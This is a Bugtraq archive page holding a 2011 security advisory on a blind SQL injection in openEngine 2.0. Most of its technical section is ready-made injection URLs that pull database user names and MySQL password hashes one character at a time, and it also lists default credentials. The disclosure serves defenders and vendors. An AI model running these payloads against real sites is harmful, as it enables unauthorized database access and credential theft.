[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

openEngine 2.0 'id' Blind SQL Injection vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: openEngine 2.0 'id' Blind SQL Injection vulnerability
From: sschurtz@xxxxxxxxxxx
Date: Tue, 27 Sep 2011 07:05:53 GMT

Advisory:               openEngine 2.0 'id' Blind SQL Injection vulnerability
Advisory ID:            SSCHADV2011-019
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on openEngine 2.0 100226
Vendor URL:             http://www.openengine.de/
Vendor Status:          informed
CVE-ID:                 -

==========================
Vulnerability Description:
==========================

openEngine 2.0 is prone to a Blind SQL Injection

==================
Technical Details:
==================

Database information

User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)

Blind SQL Injection

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND 
('a'='a&key= <- error
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND 
('a'='a&key= <- no error

User-Guessing

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM 
information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a  <- error 
(e)

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM 
information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a  <- error 
(a)

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM 
information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a  <- error 
(s)

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM 
information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a  <- error 
(y)

Password(Hash)-Guessing

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM 
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND ('a'='a <- 
error (*)

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM 
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND ('a'='a <- 
error (E)

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM 
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND ('a'='a <- 
error (8)
.. and so on

=========
Solution:
=========

-

====================
Disclosure Timeline:
====================

25-Sep-2011 - informed developers
26-Sep-2011 ? release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.openengine.de/
http://www.rul3z.de/advisories/SSCHADV2011-019.txt

Prev by Date: [security bulletin] HPSBUX02702 SSRT100606 rev.4 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
Next by Date: NGS00109 Patch Notification: ImpressPages CMS Remote code execution
Previous by thread: [security bulletin] HPSBUX02702 SSRT100606 rev.4 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
Next by thread: NGS00109 Patch Notification: ImpressPages CMS Remote code execution
Index(es):
- Date
- Thread